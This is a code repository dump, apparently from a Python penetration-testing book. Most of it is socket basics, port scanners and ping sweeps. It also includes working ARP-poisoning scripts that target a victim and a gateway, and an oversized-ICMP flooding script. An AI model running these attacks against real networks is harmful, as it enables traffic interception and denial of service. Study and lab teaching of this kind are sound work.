├── .gitattributes
├── License
├── Module 1
├── Chapter 10
│ ├── multi_process.py
│ └── multi_threaded.py
├── Chapter 2
│ ├── hostdetails.py
│ └── publicip.py
├── Chapter 3
│ ├── ifacesdetails.py
│ ├── nmap_scannner.py
│ └── ssh_login.py
├── Chapter 4
│ ├── smtp_vrfy.py
│ └── username_generator.py
├── Chapter 5
│ ├── msfrpc.rc
│ └── msfrpc_smb.py
├── Chapter 6
│ ├── dirtester.py
│ ├── headrequest.py
│ ├── httplib2_brute.py
│ └── request_brute.py
├── Chapter 7
│ ├── banner_grabber.py
│ ├── rfinetcatexecute.php
│ ├── rfipayloadexecute.php
│ ├── rfiping.php
│ ├── rfiuseradd.php
│ ├── tcpdump.sh
│ └── tftp_download.py
├── Chapter 8
│ ├── ftp_exploit.py
│ ├── mp3_exploit.py
│ ├── tcp_exploit.py
│ ├── udp_exploit.py
│ └── wrapper_exploit.py
├── Chapter 9
│ ├── nmap_doc_generator.py
│ └── nmap_parser.py
├── LICENSE.md
├── README.md
└── setup.sh
├── Module 2
├── Chapter 1
│ └── first chapter _programs
│ │ ├── clientside
│ │ ├── client1.py
│ │ ├── client3.py.py
│ │ └── udp2.py
│ │ ├── connect_ex.py
│ │ ├── getadd1.py
│ │ ├── server1.py
│ │ ├── server2.py
│ │ ├── server3.py
│ │ ├── udp1.py
│ │ ├── udptime1.py
│ │ └── udptime2.py
├── Chapter 2
│ └── Programs
│ │ ├── iptcpscan.py
│ │ ├── iptcpscan_t.py
│ │ ├── iptcpscan_t_l.py
│ │ ├── mohit.raj
│ │ ├── ping_sweep.py
│ │ ├── ping_sweep_th.py
│ │ ├── ping_sweep_th_l.py
│ │ ├── portsc14.py
│ │ └── updatec.py
├── Chapter 3
│ └── Chapter 3
│ │ ├── ack.py
│ │ ├── arpsp.py
│ │ ├── client side
│ │ └── unstruc.py
│ │ ├── eth.py
│ │ ├── fin.py
│ │ ├── halfopen.py
│ │ ├── netdiss.py
│ │ ├── pingofd.py
│ │ ├── sniffer1.py
│ │ ├── str1.py
│ │ └── struct1.py
├── Chapter 4
│ └── Chapter 4
│ │ ├── deauth.py
│ │ ├── first_ssid_sniffer.py
│ │ ├── mac_d.py
│ │ ├── mac_flood.py
│ │ ├── probe_req.py
│ │ ├── scapy_ssid.py
│ │ └── ssid.py
├── Chapter 5
│ └── Programs
│ │ ├── banner.py
│ │ ├── div.py
│ │ ├── header.py
│ │ ├── info.py
│ │ ├── par3.py
│ │ └── whois.py
├── Chapter 6
│ └── Programs
│ │ ├── DDOS_detect1.py
│ │ ├── mimp.py
│ │ ├── parameter temp.py
│ │ ├── simp.py
│ │ └── sisp.py
└── Chapter 7
│ ├── Python program files
│ ├── mohit.raj
│ └── mohit.xss
│ ├── comment.sql
│ ├── comment_xss_web
│ ├── Screenshot.png
│ ├── comm.html
│ ├── comm.html~
│ ├── connect.php
│ ├── connect.php~
│ ├── dis.php
│ ├── dis.php~
│ ├── disp.php~
│ ├── hack.html~
│ ├── in.html
│ ├── index (another copy).php
│ ├── index (copy).php
│ ├── index.php
│ ├── index.php~
│ ├── login.php
│ ├── mmm.php~
│ ├── movies.html
│ ├── movies.html~
│ ├── new.html
│ ├── submit (copy).php
│ ├── submit.php
│ ├── submit.php~
│ ├── upload
│ │ ├── new.html
│ │ ├── upload.php
│ │ ├── upload.php~
│ │ └── upload_file.php~
│ └── wel.jpg
│ ├── data_handler.py
│ ├── htm_sql_web
│ ├── Chap10_Eg01.html~
│ ├── Welcome to Facebook - Log In, Sign Up or Learn More_files
│ │ ├── 851558_160351450817973_1678868765_n.png
│ │ ├── 851565_602269956474188_918638970_n.png
│ │ ├── 851585_216271631855613_2121533625_n.png
│ │ ├── BPIOtBFaNNP.js
│ │ ├── DHqcHvznmxi.js
│ │ ├── DIRB97fDvPv.js
│ │ ├── Dp4ZyEUChD-.css
│ │ ├── GsNJNwuI-UM.gif
│ │ ├── NEfdYpfy3BJ.js
│ │ ├── QM9Ch6kMle9.js
│ │ ├── aPGRKdTiwOZ.css
│ │ ├── b9A6iGH4Mhb.js
│ │ ├── dVDIw5SgUkG.js
│ │ ├── fsstOybDL_F.css
│ │ ├── hH060TR7d7-.js
│ │ ├── sD_-OUjPR3s.js
│ │ ├── uI_8airZaGr.js
│ │ ├── vGXdh-QRY8J.js
│ │ ├── wDeFc95XQ9B.css
│ │ └── x3bsMJyVkPp.css
│ ├── adds
│ │ ├── Thumbs.db
│ │ ├── add1_detail.jpg
│ │ ├── add1_thumb.jpg
│ │ ├── add2_detail.jpg
│ │ ├── add2_thumb.jpg
│ │ ├── add3_detail.jpg
│ │ ├── add3_thumb.jpg
│ │ ├── add4_detail.jpg
│ │ └── add4_thumb.jpg
│ ├── addtocart.php
│ ├── admin.php~
│ ├── admin
│ │ ├── addCategory.php
│ │ ├── addProduct-withoutAJAX.php
│ │ ├── addProduct.php
│ │ ├── deleteProduct.php
│ │ ├── editProduct.php
│ │ ├── getCategoryList.php
│ │ ├── index-old20-12-11.php
│ │ ├── index.php
│ │ ├── leftmenu-old30-12-11.php
│ │ ├── leftmenu.php
│ │ ├── logout.php
│ │ ├── maincontent.php
│ │ ├── styles
│ │ │ └── admin.css
│ │ ├── viewCategory.php
│ │ ├── viewProducts-old10-01-12.php
│ │ └── viewProducts.php
│ ├── ajax
│ │ ├── ajax.php
│ │ ├── ajax2.php
│ │ ├── ajaxresponse.php
│ │ ├── gethint.php
│ │ └── jquery
│ │ │ ├── fade.php
│ │ │ ├── fadeout.php
│ │ │ ├── fadeto.php
│ │ │ ├── jq1.php
│ │ │ ├── jq_ajax.php
│ │ │ ├── js
│ │ │ └── jquery-1.5.1.js
│ │ │ ├── sjq.html
│ │ │ ├── slideToggle.php
│ │ │ └── testFile.txt
│ ├── auth.php~
│ ├── bar.php
│ ├── basics
│ │ ├── Abstract.php
│ │ ├── Clone.php
│ │ ├── Error.php
│ │ ├── Exception.php
│ │ ├── FileProgramming.php
│ │ ├── File_uploading.php
│ │ ├── Inheritance.php
│ │ ├── REGEX.php
│ │ ├── Reflection.php
│ │ ├── Strings.php
│ │ ├── admins.csv
│ │ ├── contacts.csv
│ │ ├── counter.txt
│ │ ├── customException.php
│ │ ├── form.php
│ │ ├── forms_GET.php
│ │ ├── forms_POST.php
│ │ ├── multipleException.php
│ │ ├── testFile.txt
│ │ └── uploaded
│ │ │ ├── golden.gif
│ │ │ ├── green.gif
│ │ │ └── red.gif
│ ├── cancelReturn.php
│ ├── check.php~
│ ├── checkOut.php
│ ├── classes
│ │ ├── Cart.php
│ │ ├── Category.php
│ │ ├── Pagination.php
│ │ ├── Product.php
│ │ └── Template.php
│ ├── comm.html
│ ├── comm.html~
│ ├── config.php
│ ├── config.php~
│ ├── confirmCheckout.php
│ ├── cong.php~
│ ├── connect.php~
│ ├── datastore.php
│ ├── db
│ │ ├── 20111230.sql
│ │ └── 20120110.sql
│ ├── dis.php~
│ ├── disp.php~
│ ├── display.php~
│ ├── edit.php~
│ ├── editabout.php~
│ ├── editabout1.php~
│ ├── editdate.php~
│ ├── editdate1.php~
│ ├── editmail.php~
│ ├── editname.php~
│ ├── editname1.php~
│ ├── emptycart.php
│ ├── formpage.html~
│ ├── hack.html
│ ├── home (copy).php~
│ ├── home.php~
│ ├── home1.php~
│ ├── images
│ │ ├── Extra
│ │ │ ├── Thumbs.db
│ │ │ ├── menuActive.jpg
│ │ │ ├── menu_bg.png
│ │ │ ├── menu_bgx.jpg
│ │ │ ├── menu_bgxx.jpg
│ │ │ └── menu_hvrxxx.jpg
│ │ ├── Thumbs.db
│ │ ├── footer_bg.jpg
│ │ ├── menu_bg.jpg
│ │ ├── menu_hvr.jpg
│ │ └── menu_hvr.psd
│ ├── include
│ │ ├── adds.php
│ │ ├── footerMenu.php
│ │ └── headerMenu.php
│ ├── index.php
│ ├── index.php~
│ ├── ins.html~
│ ├── ins.php~
│ ├── inse.php~
│ ├── insert.php~
│ ├── inst.php~
│ ├── login.php~
│ ├── logout.php~
│ ├── mainContents.php
│ ├── mmm.php~
│ ├── paypallReturn.php
│ ├── process.php~
│ ├── reg.php~
│ ├── register.php~
│ ├── register2.php~
│ ├── removeItem.php
│ ├── somepage.php~
│ ├── style
│ │ └── php90.css
│ ├── submit.php~
│ ├── testimages
│ │ ├── AddToCart.gif
│ │ ├── FeaturedProducts.jpg
│ │ ├── FeaturedProducts1.jpg
│ │ ├── NewsBanner.jpg
│ │ ├── Thumbs.db
│ │ ├── backgrounds
│ │ │ ├── Thumbs.db
│ │ │ ├── black_brown.jpg
│ │ │ ├── prem_top_bg1.jpg
│ │ │ ├── rew_un_top1.jpg
│ │ │ ├── round.png
│ │ │ ├── rs_logo_deko_big.png
│ │ │ ├── st_top_fl4.gif
│ │ │ ├── top_green.png
│ │ │ ├── top_green_2.gif
│ │ │ └── white-background-home-top.jpg
│ │ ├── computer
│ │ │ ├── Acer-Aspire-5336.jpg
│ │ │ ├── Acer-Extensa-5620.jpg
│ │ │ ├── Asus-1015.jpg
│ │ │ ├── Dell-380 MT.jpg
│ │ │ ├── Dell-4700C.gif
│ │ │ ├── Dell-Inspiron-15R-N5010.jpg
│ │ │ ├── Dell-XPS-One.gif
│ │ │ ├── Dell.jpg
│ │ │ ├── Dell_GX270.jpg
│ │ │ ├── Dell_Studio_17.gif
│ │ │ ├── HP-9100.jpg
│ │ │ ├── HP-Pavilion-DV6.jpg
│ │ │ ├── HP-Pavilion.gif
│ │ │ ├── Lenovo-30113HU.jpg
│ │ │ ├── Lenovo-C315.jpg
│ │ │ ├── Lenovo-Essential.jpg
│ │ │ ├── Lenovo-IdeaCenter-A700.jpg
│ │ │ ├── Lenovo-IdeaPad-U260.jpg
│ │ │ ├── Lenovo-IdeaPad-Y560.jpg
│ │ │ ├── Lenovo-M58.jpg
│ │ │ ├── Lenovo-ThinkCentre-A57.jpg
│ │ │ ├── Lenovo-Thinkpad-X100E.jpg
│ │ │ ├── Lenovo-W700.jpg
│ │ │ ├── Lenovo_G450.gif
│ │ │ ├── Sony_Vaio_FW260J.gif
│ │ │ ├── Thumbs.db
│ │ │ ├── acer.jpg
│ │ │ ├── asus.jpg
│ │ │ ├── hp.png
│ │ │ ├── hp_dx2000.jpg
│ │ │ └── lenovo.gif
│ │ ├── dod.gif
│ │ ├── dod1.jpg
│ │ ├── electronics
│ │ │ ├── HDTV.jpg
│ │ │ ├── HomeTheater.jpg
│ │ │ ├── Samsung-Home-Theater-HT.gif
│ │ │ ├── Sony-Bravia-KDL-52EX700.jpg
│ │ │ ├── Sony-HT-SF2300.gif
│ │ │ ├── Sony-XBR60LX900.jpg
│ │ │ ├── Thumbs.db
│ │ │ └── sony.jpg
│ │ ├── footerbg.png
│ │ ├── headerbg.png
│ │ ├── hot_deals.png
│ │ ├── hot_deals1.jpg
│ │ ├── mobile
│ │ │ ├── Nokia-5800-XpressMusic.jpg
│ │ │ ├── Nokia-C7.jpg
│ │ │ ├── Nokia-E71.gif
│ │ │ ├── Nokia-N900.jpg
│ │ │ ├── Nokia_N8.jpg
│ │ │ ├── SE-C901.jpg
│ │ │ ├── SE-Vivaz-Pro.jpg
│ │ │ ├── SE-W995.jpg
│ │ │ ├── SE-Zylo.jpg
│ │ │ ├── SE_Aino.jpg
│ │ │ ├── SE_Aino_U10i_Big.jpg
│ │ │ ├── SE_Xperia_10.jpg
│ │ │ ├── Samsung-Galaxy-S.jpg
│ │ │ ├── Samsung-Wave.jpg
│ │ │ ├── Thumbs.db
│ │ │ ├── apple-iphone.jpg
│ │ │ ├── iPhone-3G.jpg
│ │ │ ├── iPhone-3GS.jpg
│ │ │ ├── iPhone-4.jpg
│ │ │ ├── nokia.jpg
│ │ │ ├── samsung.png
│ │ │ └── sonyericsson.jpg
│ │ ├── music
│ │ │ ├── Apple-iPod.jpg
│ │ │ ├── Coby-MP-705-1GB.jpg
│ │ │ ├── Sony-NWZ-E345-16-GB.jpg
│ │ │ ├── Thumbs.db
│ │ │ ├── iPod-Nano.jpg
│ │ │ ├── iPod-Shuffle.jpg
│ │ │ ├── iPod-Touch.jpg
│ │ │ └── mp3player.jpg
│ │ ├── networking
│ │ │ ├── Belkin-Network-Cable-15M.png
│ │ │ ├── Cisco-1811WAGBK9-RF.jpg
│ │ │ ├── Linksys-WRT55AG-Wireless.gif
│ │ │ ├── NetworkCable.jpg
│ │ │ ├── NetworkRouter.jpg
│ │ │ └── Thumbs.db
│ │ ├── sos_logo.png
│ │ ├── storeAd1.jpg
│ │ ├── storeAd2.jpg
│ │ ├── storeAd3.gif
│ │ ├── storeAd4.jpg
│ │ ├── storeBanner1.jpg
│ │ ├── storeBanner2.jpg
│ │ ├── storeBanner3.jpg
│ │ ├── storeBanner4.jpg
│ │ └── storeBanner5.jpg
│ ├── updateBasket.php
│ ├── verify.php~
│ └── viewCart.php
│ ├── login1.py
│ ├── sql_form6.py
│ ├── sql_form7.py
│ ├── xss.py
│ ├── xss_data_handler.py
│ └── xss_list.py
├── Module 3
├── Chapter 1
│ ├── 1_shodan_info_gathering.py
│ ├── 2_google_search_API.py
│ ├── 3_google_profile_pics.py
│ ├── 4_google_additional_results.py
│ ├── 5_screenshots.py
│ ├── 6_screenshot_by_port.py
│ ├── 7_screenshot_by_port_threaded.py
│ ├── 8_spidering_websites.py
│ └── screenshot.py
├── Chapter 2
│ ├── URL-regex.txt
│ ├── basicname.py
│ ├── brutepasswords.py
│ ├── bruteusernames.py
│ ├── commentfinder.py
│ ├── filebrute.py
│ ├── scapypingsweep.py
│ ├── scapyportscan.py
│ └── usernamecheck.py
├── Chapter 3
│ ├── DirectoryTraversal.py
│ ├── Fuzzer.py
│ ├── Headerxss.py
│ ├── Shellshocker.py
│ ├── URL-XSS.py
│ ├── XSSFinder.py
│ └── jschecker.py
├── Chapter 4
│ ├── Subs.py
│ ├── Timer.py
│ ├── blindsql.py
│ ├── booleanSQL.py
│ └── urlsqli.py
├── Chapter 5
│ ├── basic_auth.py
│ ├── clickjack.py
│ ├── cookies.py
│ ├── headers_enum.py
│ ├── insecure_headers.py
│ ├── send_cookies.py
│ └── user_agent.py
├── Chapter 6
│ ├── StegoFull.py
│ ├── StegoText.py
│ ├── imgurClient.py
│ └── imgurServer.py
├── Chapter 7
│ ├── All.py
│ ├── Atbash.py
│ ├── Base 64 encode.py
│ ├── Bcrypt.py
│ ├── KeyReuse.py
│ ├── LCG-brute.py
│ ├── MD5 crack.py
│ ├── MD5.py
│ ├── Real Example.py
│ └── Sub.py
├── Chapter 8
│ ├── FTPExfil.py
│ ├── HttpExfil.py
│ ├── Netcat.py
│ ├── TwitterDecode.py
│ ├── TwitterExfil.py
│ ├── data.php
│ └── simpleHTTPExfil.py
├── Chapter 9
│ ├── bs2.py
│ ├── bs3.py
│ ├── maltegodef.py
│ ├── nmapparser.py
│ ├── pcapparse.py
│ └── sslscanparser.py
└── Read Me.txt
├── ReadMe.txt
└── Readme.md
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
4 | # Custom for Visual Studio
5 | *.cs diff=csharp
6 |
7 | # Standard to msysgit
8 | *.doc diff=astextplain
9 | *.DOC diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot diff=astextplain
13 | *.DOT diff=astextplain
14 | *.pdf diff=astextplain
15 | *.PDF diff=astextplain
16 | *.rtf diff=astextplain
17 | *.RTF diff=astextplain
18 |
--------------------------------------------------------------------------------
/License:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2016 Packt
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/Module 1/Chapter 5/msfrpc.rc:
--------------------------------------------------------------------------------
1 | load msgrpc Pass=msfrpcpassword
2 |
--------------------------------------------------------------------------------
/Module 1/README.md:
--------------------------------------------------------------------------------
1 | Before using any of these code snippets you should run the setup.sh file.
2 | Once that is complete you will be able to use the scripts without issue.
3 | All code here is provided to showcase ways you can link methods of
4 | exploiting systems with scripts and to fill voids those industry standard tools
5 | do not provide. Many new professionals ask, why are there no tools that do
6 | these simple tasks. The answer is simple, why does a whole tool need to be
7 | created for simple task that are unique, but time consuming to a particular environment.
8 | I hope you enjoy this book and the scripts provided as much as I have writing it.
9 |
--------------------------------------------------------------------------------
/Module 2/Chapter 1/first chapter _programs/clientside/client1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
3 | host = "192.168.0.1"
4 | port =12345
5 | s.connect((host,port))
6 | print s.recv(1024)
7 |
8 | s.send("Hello Server")
9 | s.close()
--------------------------------------------------------------------------------
/Module 2/Chapter 1/first chapter _programs/clientside/client3.py.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.0.1"
3 | port = 12345
4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
5 | s.connect((host, port))
6 | buf = bytearray("-" * 30) # buffer created
7 | print "Number of Bytes ",s.recv_into(buf)
8 | print buf
9 | s.close
--------------------------------------------------------------------------------
/Module 2/Chapter 1/first chapter _programs/clientside/udp2.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.0.1"
3 | port = 12346
4 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
5 | print s.sendto("hello all",(host,port))
6 | s.close()
--------------------------------------------------------------------------------
/Module 2/Chapter 1/first chapter _programs/connect_ex.py:
--------------------------------------------------------------------------------
1 | import socket
2 |
3 | rmip ='127.0.0.1'
4 | portlist = [22,23,80,912,135,445,20]
5 |
6 | for port in portlist:
7 | sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
8 | result = sock.connect_ex((rmip,port))
9 | print port,":", result
10 | sock.close()
11 |
12 |
--------------------------------------------------------------------------------
/Module 2/Chapter 1/first chapter _programs/getadd1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | def get_protnumber(prefix):
3 | return dict( (getattr(socket, a), a)
4 | for a in dir(socket)
5 | if a.startswith(prefix))
6 |
7 | proto_fam = get_protnumber('AF_')
8 | types = get_protnumber('SOCK_')
9 | protocols = get_protnumber('IPPROTO_')
10 |
11 | for res in socket.getaddrinfo('www.thapar.edu', 'http'):
12 |
13 | family, socktype, proto, canonname, sockaddr = res
14 |
15 | print 'Family :', proto_fam[family]
16 | print 'Type :', types[socktype]
17 | print 'Protocol :', protocols[proto]
18 | print 'Canonical name:', canonname
19 | print 'Socket address:', sockaddr
20 |
--------------------------------------------------------------------------------
/Module 2/Chapter 1/first chapter _programs/server1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.0.1" #Server address
3 | port = 12345 #Port of Server
4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
5 | s.bind((host,port)) #bind server
6 | s.listen(2)
7 | conn, addr = s.accept()
8 | print addr, "Now Connected"
9 | conn.send("Thank you for connecting")
10 | conn.close()
11 |
--------------------------------------------------------------------------------
/Module 2/Chapter 1/first chapter _programs/server2.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.0.1"
3 | port = 12345
4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
5 | s.bind((host,port))
6 | s.listen(2)
7 | while True:
8 | conn, addr = s.accept()
9 | print addr, "Now Connected"
10 | conn.send("Thank you for connecting")
11 | conn.close()
12 |
--------------------------------------------------------------------------------
/Module 2/Chapter 1/first chapter _programs/server3.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.0.1"
3 | port = 12345
4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
5 | s.bind((host, port))
6 | s.listen(1)
7 | conn, addr = s.accept()
8 | print "connected by", addr
9 | conn.send("Thanks")
10 | conn.close()
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/Module 2/Chapter 1/first chapter _programs/udp1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.0.1"
3 | port = 12346
4 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
5 | s.bind((host,port))
6 | data, addr = s.recvfrom(1024)
7 | print "recevied from ",addr
8 | print "obtained ", data
9 | s.close()
--------------------------------------------------------------------------------
/Module 2/Chapter 1/first chapter _programs/udptime1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.0.1"
3 | port = 12346
4 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
5 | s.bind((host,port))
6 | s.settimeout(5)
7 | data, addr = s.recvfrom(1024)
8 | print "recevied from ",addr
9 | print "obtained ", data
10 | s.close()
--------------------------------------------------------------------------------
/Module 2/Chapter 1/first chapter _programs/udptime2.py:
--------------------------------------------------------------------------------
1 | import socket
2 | host = "192.168.0.1"
3 | port = 12346
4 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
5 | try:
6 |
7 | s.bind((host,port))
8 | s.settimeout(5)
9 | data, addr = s.recvfrom(1024)
10 | print "recevied from ",addr
11 | print "obtained ", data
12 | s.close()
13 |
14 | except socket.timeout :
15 | print "Client not connected"
16 | s.close()
--------------------------------------------------------------------------------
/Module 2/Chapter 2/Programs/iptcpscan.py:
--------------------------------------------------------------------------------
1 | import socket
2 | from datetime import datetime
3 | net= raw_input("Enter the IP address ")
4 | net1= net.split('.')
5 | a = '.'
6 | net2 = net1[0]+a+net1[1]+a+net1[2]+a
7 | st1 = int(raw_input("Enter the Starting Number "))
8 | en1 = int(raw_input("Enter the Last Number "))
9 | en1=en1+1
10 | t1= datetime.now()
11 | def scan(addr):
12 | sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
13 | socket.setdefaulttimeout(1)
14 | result = sock.connect_ex((addr,445))
15 | if result==0:
16 | return 1
17 | else :
18 | return 0
19 |
20 | def run1():
21 | for ip in xrange(st1,en1):
22 | addr = net2+str(ip)
23 | if (scan(addr)):
24 | print addr , "is live"
25 |
26 | run1()
27 | t2= datetime.now()
28 | total =t2-t1
29 | print "scanning complete in " , total
--------------------------------------------------------------------------------
/Module 2/Chapter 2/Programs/mohit.raj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-for-Developers/a712d19c9587d04e13b332adbc3620c0df477c89/Module 2/Chapter 2/Programs/mohit.raj
--------------------------------------------------------------------------------
/Module 2/Chapter 2/Programs/ping_sweep.py:
--------------------------------------------------------------------------------
1 | import os
2 | import platform
3 | from datetime import datetime
4 | net = raw_input("Enter the Network Address ")
5 | net1= net.split('.')
6 | a = '.'
7 | net2 = net1[0]+a+net1[1]+a+net1[2]+a
8 | st1 = int(raw_input("Enter the Starting Number "))
9 | en1 = int(raw_input("Enter the Last Number "))
10 | en1=en1+1
11 | oper = platform.system()
12 |
13 | if (oper=="Windows"):
14 | ping1 = "ping -n 1 "
15 | elif (oper== "Linux"):
16 | ping1 = "ping -c 1 "
17 | else :
18 | ping1 = "ping -c 1 "
19 | t1= datetime.now()
20 | print "Scanning in Progress"
21 | for ip in xrange(st1,en1):
22 | addr = net2+str(ip)
23 | comm = ping1+addr
24 | response = os.popen(comm)
25 | for line in response.readlines():
26 | if(line.count("TTL")):
27 | break
28 | if (line.count("TTL")):
29 | print addr, "--> Live"
30 |
31 | t2= datetime.now()
32 | total =t2-t1
33 | print "scanning complete in " , total
--------------------------------------------------------------------------------
/Module 2/Chapter 3/Chapter 3/ack.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | ip1 = IP(src="192.168.0.10", dst ="192.168.0.11")
3 | sy1 = TCP(sport =1024, dport=137, flags="A", seq=12345)
4 | packet = ip1/sy1
5 | p =sr1(packet)
6 | p.show()
7 |
--------------------------------------------------------------------------------
/Module 2/Chapter 3/Chapter 3/arpsp.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | import binascii
4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
5 | s.bind(("eth0",socket.htons(0x0800)))
6 |
7 | sor = '\x00\x0c\x29\x4f\x8e\x35'
8 |
9 | victmac ='\x00\x0C\x29\x2E\x84\x7A'
10 |
11 | gatemac = '\x00\x50\x56\xC0\x00\x08'
12 | code ='\x08\x06'
13 | eth1 = victmac+sor+code #for victim
14 | eth2 = gatemac+sor+code # for gateway
15 |
16 | htype = '\x00\x01'
17 | protype = '\x08\x00'
18 | hsize = '\x06'
19 | psize = '\x04'
20 | opcode = '\x00\x02'
21 |
22 | gate_ip = '192.168.0.1'
23 | victim_ip = '192.168.0.11'
24 | gip = socket.inet_aton ( gate_ip )
25 | vip = socket.inet_aton ( victim_ip )
26 |
27 | arp_victim = eth1+htype+protype+hsize+psize+opcode+sor+gip+victmac+vip
28 | arp_gateway= eth2+htype+protype+hsize+psize+opcode+sor+vip+gatemac+gip
29 |
30 |
31 | while 1:
32 | s.send(arp_victim)
33 | s.send(arp_gateway)
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Module 2/Chapter 3/Chapter 3/client side/unstruc.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
4 | host = "192.168.0.1"
5 | port =12347
6 | s.connect((host,port))
7 | msg= s.recv(1024)
8 | print msg
9 | print struct.unpack('hhl',msg)
10 | s.close()
--------------------------------------------------------------------------------
/Module 2/Chapter 3/Chapter 3/eth.py:
--------------------------------------------------------------------------------
1 | import socket
2 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
3 | s.bind(("eth0",socket.ntohs(0x0800)))
4 |
5 | sor = '\x00\x0c\x29\x4f\x8e\x35'
6 |
7 | des ='\x00\x0C\x29\x2E\x84\x7A'
8 | code ='\x08\x00'
9 | eth = des+sor+code
10 | s.send(eth)
11 |
--------------------------------------------------------------------------------
/Module 2/Chapter 3/Chapter 3/fin.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | ip1 = IP(src="192.168.0.10", dst ="192.168.0.11")
3 | sy1 = TCP(sport =1024, dport=80, flags="F", seq=12345)
4 | packet = ip1/sy1
5 | p =sr1(packet)
6 | p.show()
7 |
--------------------------------------------------------------------------------
/Module 2/Chapter 3/Chapter 3/halfopen.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | ip1 = IP(src="192.168.0.10", dst ="192.168.0.11" )
3 | tcp1 = TCP(sport =1024, dport=80, flags="S", seq=12345)
4 | packet = ip1/tcp1
5 | p =sr1(packet, inter=1)
6 | p.show()
7 |
8 | rs1 = TCP(sport =1024, dport=80, flags="R", seq=12347)
9 | packet1=ip1/rs1
10 | p1 = sr1(packet1)
11 | p1.show
12 |
13 |
--------------------------------------------------------------------------------
/Module 2/Chapter 3/Chapter 3/netdiss.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import binascii
3 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
4 | s.bind(("eth0",socket.htons(0x0800)))
5 |
6 | def mach(mac):
7 | a = '\\x'
8 | mac1= mac.replace(':',a)
9 | mac2= a+mac1
10 | return mac2
11 |
12 | sor = '\x48\x41\x43\x4b\x45\x52'
13 |
14 |
15 | vic1 = raw_input("Enter the Victim MAC ")
16 | victmac = mach(vic1)
17 | print victmac
18 |
19 | gate1 = raw_input("Enter the gateway MAC ")
20 | gatemac = mach(gate1)
21 | print gatemac
22 | code ='\x08\x06'
23 | eth1 = victmac+sor+code #for victim
24 | eth2 = gatemac+sor+code # for gateway
25 |
26 | htype = '\x00\x01'
27 | protype = '\x08\x00'
28 | hsize = '\x06'
29 | psize = '\x04'
30 | opcode = '\x00\x02'
31 |
32 |
33 | gate_ip = '192.168.0.1'
34 | victim_ip = '192.168.0.11'
35 | gip = socket.inet_aton ( gate_ip )
36 |
37 | vip = socket.inet_aton ( victim_ip )
38 |
39 |
40 | arp_victim = eth1+htype+protype+hsize+psize+opcode+sor+gip+victmac+vip
41 | arp_gateway= eth2+htype+protype+hsize+psize+opcode+sor+vip+gatemac+gip
42 |
43 |
44 | while 1:
45 | s.send(arp_victim)
46 | s.send(arp_gateway)
47 |
48 |
49 |
--------------------------------------------------------------------------------
/Module 2/Chapter 3/Chapter 3/pingofd.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | ip1 = IP(src="192.168.0.99", dst ="192.168.0.11")
3 |
4 | packet = ip1/ICMP()/("m"*60000)
5 | send(packet)
6 | i=0
7 | while i<20 :
8 | send(packet)
9 | i = i+1
10 |
--------------------------------------------------------------------------------
/Module 2/Chapter 3/Chapter 3/sniffer1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | import binascii
4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
5 | while True:
6 |
